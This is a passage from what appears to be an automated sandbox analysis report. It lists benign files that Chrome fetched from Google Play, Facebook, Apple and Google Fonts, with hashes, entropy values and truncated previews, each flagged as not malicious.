                                                                                                                                                                                                                                  SHA-512:C857CFFB11171A170D452843EB2B505AA3672E0BCE99F470AC076D51FFA234313608AFF2C8774994C48008D857243E1B2EF560A5EB44F9AC8603935619AD2843
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,C7s1K,CKm2Wb,CR2XMb,CvxVpd,DRmmld,EEDORb,EFQ78c,ElYdAc,FCpbqb,FoxcOd,FuzVxc,G2gJT,GjTCAc,GkRiKb,Grlxwe,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,J22eF,JH2zc,JNoxi,JWUKXe,JiSSTb,KUM7Z,Kfp2G,L1AAkb,LCkxpb,LEikZe,LRovxc,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PAQZbb,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,Qf3l6c,QxNhAd,RBsfwb,RMhBfe,RQJprf,RjJvI,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,WhJNk,Wt6vjf,XMEW5d,XVMNvd,Y413Bc,YTx6oe,Z5uLle,Z5wzge,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,baVq7b,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fI4Vwc,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,hhhU8,iAQMie,iLGjNb,jZ2Ncd,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lDZ2Fb,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,mzLjxc,n73qwf,nQqY4c,o6xa3b,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,q8s33d,qczJ2b,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sJhETb,sOXFj,soHxf,t1sulf,tBvKNb,tKHFxf,uj8DUc,vNKqzc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,wxpxie,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbKb5e,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=fl2Zj,yABLaf,j9sf1"
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".VfPpkd-YAxtVc{background-color:#333333}.VfPpkd-gIZMF{color:rgba(255,255,255,.87)}.VfPpkd-YAxtVc{min-width:344px}@media (max-width:344px),(max-width:480px){.VfPpkd-YAxtVc{min-width:100%}}.VfPpkd-YAxtVc{max-width:672px}.VfPpkd-YAxtVc{box-shadow:0 3px 5px -1px rgba(0,0,0,.2),0 6px 10px 0 rgba(0,0,0,.14),0 1px 18px 0 rgba(0,0,0,.12)}.VfPpkd-YAxtVc{border-radius:4px;border-radius:var(--mdc-shape-small,4px)}.VfPpkd-Ng57nc{display:none;position:fixed;right:0;bottom:0;left:0;align-items:center;justify-content:center;box-sizing:border-box;pointer-events:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}.VfPpkd-Ng57nc-OWXEXe-uGFO6d,.VfPpkd-Ng57nc-OWXEXe-FNFY6c,.VfPpkd-Ng57nc-OWXEXe-FnSee{display:flex}.VfPpkd-Ng57nc-OWXEXe-FNFY6c .VfPpkd-gIZMF,.VfPpkd-Ng57nc-OWXEXe-FNFY6c .VfPpkd-M6tBBc{visibility:visible}.VfPpkd-YAxtVc{padding-left:0;padding-right:8px;display:flex;align-items:center;justify-content:flex-start;box-sizing:border-box;transform:scale(.8);opacity:0}.VfPpkd-Y
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 9832, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9832
                                                                                                                                                                                                                                  Entropy (8bit):7.976940929423749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9+c1c2hRHfRMykrL1gCCSaxwEpY00OsMwpEmPScd3pLauSg+IaWuY9:9t1c278H1bOxzYZLTpEgScd5LauT9
                                                                                                                                                                                                                                  MD5:EFE937997E08E15B056A3643E2734636
                                                                                                                                                                                                                                  SHA1:D02DECBF472A0928B054CC8E4B13684539A913DB
                                                                                                                                                                                                                                  SHA-256:53F2931D978BF9B24D43B5D556ECF315A6B3F089699C5BA3A954C4DDE8663361
                                                                                                                                                                                                                                  SHA-512:721C903E06F00840140ED5EEC06329221A2731EFC483E025043675B1F070B03A544F8EB153B63CD981494379A9E975F014B57C286596B6F988CEE1AAF04A8C65
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu5mxKOzY.woff2
                                                                                                                                                                                                                                  Preview:wOF2......&h......[8..&..........................j..V.6.`....T..<.....l.D........6.$.... ..t. ..I..Q.......!z.OQ.,..(J.......8.!.>P..E.\Q..DqA.SF...8.5kfZ?...2.6.mnX.(...&Knh....X\...}?{../n.@."....|.$....(.+.\=Bc...Dka.=.."..6......~ro.....a~>7..$..+.I..#.4.$.....d..3..]=.....fr8.}l....'C0.kT.DI.x%.....<H..i....u.....v.{..E5..D".........-.V.Z..K.RP..O.......6...@.x...@.....d.n.....Om..........#..s..4.....+....P&...V...>.|L......`Iw......C8..T.5.0|}....._?......&V..N..p....D..\.7q.gY:II.@....D.....Y.._.w!...~...Q!$...*.so|..W.l.. .|...\.w3...t..v....>>A.(p.Aq."%'J.&$......Q.....)...rQ...-.-.....EY..H..^.Fne..=Gb......Z..k..D<.<..x..e9...."...v.......`d..../$ ..S.i..i......7..6..2.Y.... .0........F......;.P.o'..........h......l... .0...3.[.`.C]^(....Oy..+:.3<.,=...../...\?QU.K..*}NfL.J.*=....m..d..Zs..g.<.+......j.j./..fbaec.....A....V.V.z..5i.U....[.>......6k.EI)KV.Y.)#k.=...;.....([.\..'...6".E...hC..u.>..........'.iT.....c.[w... .N...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6078)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9845
                                                                                                                                                                                                                                  Entropy (8bit):5.240704384788954
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zbSDfbbLJTpAX1lsfzNcRMtuzibSDLp1nmtNgb8JzGHzCrKI3qPMc33wBgxOxPHo:z2fbPJu1lsfzNcRg2i27nmtNgolG3XZh
                                                                                                                                                                                                                                  MD5:7A5CAC4380406D9DF2E192904976505F
                                                                                                                                                                                                                                  SHA1:8F2A83E30BB8C97954B6941E22E91418E16DCD6F
                                                                                                                                                                                                                                  SHA-256:C2F0A7C478DBE90FCD594DB0A07442A9802DBBDF3FCA00F4DCDD8F3052879EEF
                                                                                                                                                                                                                                  SHA-512:54F3DA732B64E5B1743A75A96B19398AAB933823E7D8E9F98FC700EB2444BF4EAAF82A7CD463F0F29389DC63494A799A072307B4BCBA8D70351319ECB2257216
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("EmojiRendererData",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(){}a.isEmoji=function(a){return a>983041||a<35?!1:a===35||a===42||a>=48&&a<=57||a===169||a===174||a===8205||a===8252||a===8265||a===8419||a===8482||a===8505||a>=8596&&a<=8601||a>=8617&&a<=8618||a>=8986&&a<=8987||a===9e3||a===9167||a>=9193&&a<=9203||a>=9208&&a<=9210||a===9410||a>=9642&&a<=9643||a===9654||a===9664||a>=9723&&a<=9726||a>=9728&&a<=9732||a===9742||a===9745||a>=9748&&a<=9749||a===9752||a===9760||a>=9762&&a<=9763||a===9766||a===9770||a>=9774&&a<=9775||a>=9784&&a<=9786||a===9792||a===9794||a>=9800&&a<=9811||a>=9823&&a<=9824||a===9827||a>=9829&&a<=9830||a===9832||a===9851||a>=9854&&a<=9855||a>=9874&&a<=9879||a===9881||a>=9883&&a<=9884||a>=9888&&a<=9889||a===9895||a>=9898&&a<=9899||a>=9904&&a<=9905||a>=9917&&a<=9918||a>=9924&&a<=9925||a===9928||a>=9934&&a<=9935||a===9937||a>=9939&&a<=9940||a>=9961&&a<=9962||a>=9968&&a<=9973||a>=9975&&a<=9976||a===9978||a===9981||a===9986||a==
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):234252
                                                                                                                                                                                                                                  Entropy (8bit):7.991891027093775
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:A7r1Usfrx2zdt95pCGQEWMxXK2cMv1DDKUCD25:UWszxMdt95pOEcEZC65
                                                                                                                                                                                                                                  MD5:A889E9F992A7BC424F7CB89FE08EB741
                                                                                                                                                                                                                                  SHA1:39143EC37469A9ADDD8ED6CDE508CC3C2A886017
                                                                                                                                                                                                                                  SHA-256:86E13B446FD438C8679796705B879EDFA527A791523D1EAB088DA3F022E29FBB
                                                                                                                                                                                                                                  SHA-512:1D24BCA6E11E3F50AAFE6F59E1BF37862960488EEF77989927EE1DE4065DB040B977E6C0F25F851109150C3E2C49C7E648B6E51438AB73DF5658C6DBE0D1EC76
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/tWCdgpyyKxpkE24hVTjbnXYwTjEmt_dTTn9v4WK08-ku0TAqYxR8D91sNZCx4RQCuyxj=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.M..$.$..I/......l.U.......8.....i[;.......l..4$(*'.rP...&...9[.t^g..y........OBk.....<z....4/@._..h.h...yJZL.O.{*.$........c~.......@a...|..h.5..@.$>4...0.` I..BZ..%&F..D......g.L..51Ah.W.8 <..H.9u..?......(..=P..{..{.......E..zR0....Hej......h....lzk7..D).xS$B4M.....+*.....`5.1..GU.$L.. co4..........cbP....G.../..,...wv.l...@.B~.GH6.......{.....V....*.Q0,j&I..5.s...L..k........U5.......+..o4....cN.&.&..c.....Ib.....J......5..Z......I.S@......a.4...>..h.M..N.....P.Z@Ob}..>:*....:...M..C_..+.Gu..e".($..-..@.p..c..{.*Tv>..`.eB..........@.yj...j...s....p.1F"...c...H.[U...1.w.Xc.Z.k.Ck&a.....V.}..c.1O.j.W.?....&....{N~.G..'.IU..`...m-_`.v.....R1.L..wk#ZA.]...f...*Y.vkIL"..T.]5&..d.>3.e..Yc....R-.+.$.....{O>sF...*.y{_..?R-3....3.t.9G=.+..U+.f.|......m..{.U...>.^...&JO.l....5..~.9.L..U.m[...`.Y...|....|...0Y.&.N...t.."..`k..F.....#...i.1.=..\....~w...E.$A..A .!<l..4.m[. @....j...B.9.<z..#.Z.... c.B...I...A..R....w...-.q
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1927)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):11218
                                                                                                                                                                                                                                  Entropy (8bit):5.35617324679183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:bZWIlwG1Iv5QxUOcQRtPnIa0qVNAb2x5iUidJeJLFiNxFxSfILsBb5dl2V3iSkF:b0IT1IBOcQzvIapNAqfh+H2ILsBNPcRC
                                                                                                                                                                                                                                  MD5:E8B8ED410D52E42957CD5EFBB2DA24BB
                                                                                                                                                                                                                                  SHA1:84B2A4C493C53885B1BCC5B4C4B9DAED491EBC8C
                                                                                                                                                                                                                                  SHA-256:F298D601608D58AFC41EF27D61D9D250028C976FC185A746DAD0A6544E880A5C
                                                                                                                                                                                                                                  SHA-512:6F1E24B1B82F7F1BF32F53D20DAA9C7137C9DE73F1761369056B6F04065BE2AC0FEAB0CA5FEE960589AC9098AEEB82960BD866C8BF7CE83662C40EC8C3FE1CA8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/udpNONeEc85.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("TrustedTypesGoogleAnalyticsScriptURLPolicy",["TrustedTypes","err"],(function(a,b,c,d,e,f,g){"use strict";a={createScriptURL:function(a){if(a==="https://www.google-analytics.com/analytics.js"||a.includes("https://www.googletagmanager.com/gtag/js"))return a;throw c("err")("Violating Trusted Type policies. Provided URI (%s) is not equal to https://www.google-analytics.com/analytics.js or https://www.googletagmanager.com/gtag/js",a)}};b=c("TrustedTypes").createPolicy("google-analytics-url",a);d=b;g["default"]=d}),98);.__d("GoogleAnalytics4Setup",["DeferredCookie","ODS","TrustedTypesGoogleAnalyticsScriptURLPolicy","WebStorage"],(function(a,b,c,d,e,f,g){"use strict";var h,i;function j(){var a=(i||(i=c("WebStorage"))).getLocalStorageForRead();if(a==null){(h||(h=d("ODS"))).bumpEntityKey(6413,"cookies","google_analytics4.localStorage.read.fail");return null}return a.getItem("ga4_client_id")}function k(a){var b=(i||(i=c("WebStorage"))).getLocalStorage();if(b==null){(h||(h
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37912
                                                                                                                                                                                                                                  Entropy (8bit):7.994395927835498
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:nZmTYtorWZ8SfDb1frUxnADCh54zfaQ/EoxCjZoyZLdVph5oj/:nZSYtycDZonhh54zfaVjRZ5VD27
                                                                                                                                                                                                                                  MD5:9412333F64366A0DE0D4627CA7621438
                                                                                                                                                                                                                                  SHA1:C0B9A4AA7A050CDD7CD6D1677050650CB2848584
                                                                                                                                                                                                                                  SHA-256:4B31A4DF1829C4B2C7B545AFEA87A84FFBBAFA01DB8A9F404E5BEA8E7344E2EA
                                                                                                                                                                                                                                  SHA-512:2EA6C5566DEB497423D2BEDC517EB8A455979C1E82FB9285A70EA97F51C673C646E8D95CF8C762B732C1E8952D66B5004FC51F2CBB1B55CE49E34F7EDDEF876B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....0x...*..(.>y,.F..!.49.....j...h.i.3#./......7...}../..pv..7.._..?....}....sz..........w.G..._P.._.o...2.......w.'.c.w...../.........?..i.....G....S..z...._......[.[.}~...7...?..#...-..._....a.;...G.?.z...h.......;..................C.._p......~j~..E......................._..,.......o.'./........~...W...g.............w...K./.....e.g..2........./. ...C@...pf....R$..G..f."..`Js...|FN]~...Q..E...wA...P(g..m...b....Vp.O.}+.L.q.....O.Wo|[[- ..g+bC.z0Yw.8O.....x....C..#J,.....G....|...<.3=.'.B..?4c...]A,.~|...1..1....[{..|.....;...b..w*..N...6..W-5.p.w..v%.7~..*P.!S.G.|!..B.....w)..i..h.F_...'|....`.)... ;."$....T....`.*.&.X....&B7$...'.%eh...F$..L..@....Itg..._..... q....a..#E...J........7...B.......}A...J....W......*................: s.t.GMLADU.z...Hx....41.c......o.^.Fi'.....j.=....K.8m..."....c+....L......=.'..a......p..q....r..3.0i..yO...lcO....bh.g.y.A.....S.>.G_..........!.r"u.{.dy.t. ..n. .:.a..i.~...8....!..4..:DS.kf|q..1.@M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):152
                                                                                                                                                                                                                                  Entropy (8bit):6.323392480463441
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y1ZHz9Un3jCUlBrvrXw0UN/IrnRJ79EeehlI8XkTMCbEsC//:y1ZynTCUvrzA0aIrR19EeHXTnEsC//
                                                                                                                                                                                                                                  MD5:ED749805793D87D0D93135CC936C53FA
                                                                                                                                                                                                                                  SHA1:AF55DAC780DF44A6186AF5F0052C5DFAF8D886C7
                                                                                                                                                                                                                                  SHA-256:A022DF6D556EE3105736C31085D7EB971DDE9F5858D32C0A642AAB030D347C0C
                                                                                                                                                                                                                                  SHA-512:ABF372C4E2E3A3A5693A62C61203565234AB9BC298ADEE900057CEA5B623B13166CEFFFE1DCA69896168DF91E403897255B18C274E7EE0468F0FD9211607BB75
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/a/ACg8ocJZ_a0qI7f5pr9REiRB_V4G5VIHM_m0KU83eeL3o5d-9yiNCA=s32-rw-mo
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 .........* . .>m,.F$"..(.P...e..)c..5....&......o.!......m$.......It.....!..X..J@.&.b9..^......[.....U.M#3...8..d.;..U.7..)Y.N.Zn.....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):733
                                                                                                                                                                                                                                  Entropy (8bit):4.7574006224426535
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:YGKzFDsip968DDp8MIfE1lI11I1581f58zrF8qWKxk8IV5wDKOBuGpQJNGzF/BQU:YdxDsinqMIqlI3I1y1fyzr+jcdD9J+Sn
                                                                                                                                                                                                                                  MD5:CC64BFA00B4B3FF916A983A0C27DEA58
                                                                                                                                                                                                                                  SHA1:62452E81D49DF7E3EDAE74AE32A3E9A613DCFE86
                                                                                                                                                                                                                                  SHA-256:67CB92C8D3E193BCAC15DEBC8CC34C5D2CE531C9A13D037EBFECDC662679215A
                                                                                                                                                                                                                                  SHA-512:C6D1D59F4D354EF39AA6D59002D23AB6AEA977CC3B68FE9A6D0821FC0C6EE279390A35B8DB2E7E8D39C913694811CEF04763452D8075C63722700E2B5120F3EC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://xp.apple.com/config/1/report/xp_amp_appstore_perf
                                                                                                                                                                                                                                  Preview:{"compoundSeparator":"_","fieldsMap":{"loadUrl":{"timestampFields":{"fetchStartTime":["fetchStart"],"domainLookupStartTime":["domainLookupStart"],"domainLookupEndTime":["domainLookupEnd"],"connectionStartTime":["connectStart"],"connectionEndTime":["connectEnd"],"secureConnectionStartTime":["secureConnectionStart"],"requestStartTime":["requestStart"],"responseStartTime":["responseStart"],"responseEndTime":["responseEnd"]},"otherFields":{"requestUrl":["name"],"transferSize":["transferSize"]}}},"metricsUrl":"https://xp.apple.com/report","performance":{"samplingPercentage":0.25,"samplingPercentageUsers":0.25,"sessionDuration":60000,"samplingPercentageUsersPageRender":0.25,"sessionDurationPageRender":60000},"postFrequency":5000}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (706)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3405
                                                                                                                                                                                                                                  Entropy (8bit):5.571622388426759
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kw5TDkB1BTHASxcKqieTNtZLhXGhIdLlBIa3GRl:XTDknN2JIOG
                                                                                                                                                                                                                                  MD5:CEB5C462360ADE5182B3B5F82341F434
                                                                                                                                                                                                                                  SHA1:6BEAF99A09B111767CF624D0532075ED6EDE7809
                                                                                                                                                                                                                                  SHA-256:39BCFC697077BB76AA69B67FB4629AD9148E127039B028EC779B8011109B83DA
                                                                                                                                                                                                                                  SHA-512:81BA2078D4FB2486872DA99F1AF49CA58F454771C57E1FE3E59E78A5C92FE1ACA545260FC19C28B74B3630F457D16B562CDB380362B5B12156DA2FAF9AC69573
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,J22eF,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LRovxc,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Y413Bc,YTx6oe,Z5uLle,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("Wt6vjf");.var udb=class extends _.z{constructor(a){super(a,0,udb.ke)}rc(){return _.dh(this,1)}mf(a){return _.zh(this,1,a)}};udb.ke="f.bo";var vdb=function(a){a.nI&&(window.clearTimeout(a.nI),a.nI=0)},wdb=function(a){const b=_.ZK.get(window.location.protocol=="https:"?"SAPISID":"APISID","");a.OG=a.QE!==""&&b==="";a.UO=a.QE!=b;a.QE=b},ydb=function(a){a.Xz=!0;const b=xdb(a);let c="rt=r&f_uid="+encodeURIComponent(String(a.hJ));_.Ek(b,(0,_.Ze)(a.N,a),"POST",c)},RL=function(a){if(a.OM||a.Xz)vdb(a),a.nI=window.setTimeout((0,_.Ze)(a.H,a),Math.max(3,a.WE)*1E3)},xdb=function(a){const b=new _.Yn(a.TV);a.kK!=null&&_.jo(b,"authuser",a.kK);return b},.zdb=function(a){a.OG||(a.Xz=!0,a.WE=Math.min((a.WE||3)*2,60),RL(a))},Adb=class extends _.Vj{wd(){this.OM=!1;vdb(this);super.wd()}H(){wdb(this);if(this.Xz)return ydb(this),!1;if(!this.UO)return RL(this),!0;this.dispatchEvent("p");if(!this.hJ)return
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7860
                                                                                                                                                                                                                                  Entropy (8bit):7.955805602659907
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LOV54+q/rQD1YSiWl2/05YdNGBhK/saP1FH:LOV5MkD1ZiWl8tzYhYP3H
                                                                                                                                                                                                                                  MD5:46170B933402D7FAFD745DC0CEF0F062
                                                                                                                                                                                                                                  SHA1:239B021E0FE588B2EA6875F584E46F1B09A53E9A
                                                                                                                                                                                                                                  SHA-256:5059ED15F42F09678D74EF63726867324485A18A42A7283A4C0004EA6376CBE8
                                                                                                                                                                                                                                  SHA-512:5E6E9B8B92731A6533365CA6CAD8222F907F02FAC571700BC67145560842D9A9AC4C1EFF10327ED17245220DF14ECDAA0BF1BB4FFCBF0AB0BEF123E7ABEEAE9A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X........?..?..VP8Lc.../?...M0h.H.6.?...........v~..<...I..wP=..4.I..m#I...|].1..4.8...T...B...PCw"w.2..HR..c...'3.?.....V..... ...6....0..6..f.7.oX...L..n....s.<..k....|....y...~....G_.......M...N..CA.6....v.......v%K.3..m...1.>..o...h..P"..T=.+.....g@....9{.5.{Q.K....2.......lD.....h..l.o.Q.......].j+.c.s.........A..9.{..'....G.?s..,.A.A!.K....m....!..m;$I..8......bwUW.3s.m.m...m.]Yi.N.K_."..m.m[.Vj.}L-l..}...m.V...?..zl.m...hk.&..UO.m.nlk[.c.dI.P..\fffff....)f....rs....."....di.9z(L...+ ...CC.X.!...JTj......H..&.....x).v....uK...e1v.o.So...4....".........B.B.....-.*.C...........1..0...l..RV.X&.).`.f.l{c\(X.P..VZ..P..@C...x.iy...`.g......-.W*.R8..2..R.....T. 9=t.~.!B.a..LT....N.X.)..Lb...p^}.2.2.."..V%PK..V...9.z..3...... .#h......./p...C0. L.(.0:. ..^H.}...E.p...(@$....!.....z4.@....(`Q.IB[.(...).....Qn%..#....^_.....`.N.I!e2..S.r...hI..W...O.y.....a.5%.......eL.[.]..Q7.P.."."....%.""...);f...8...$.$..b..'9...x.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12903)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):267078
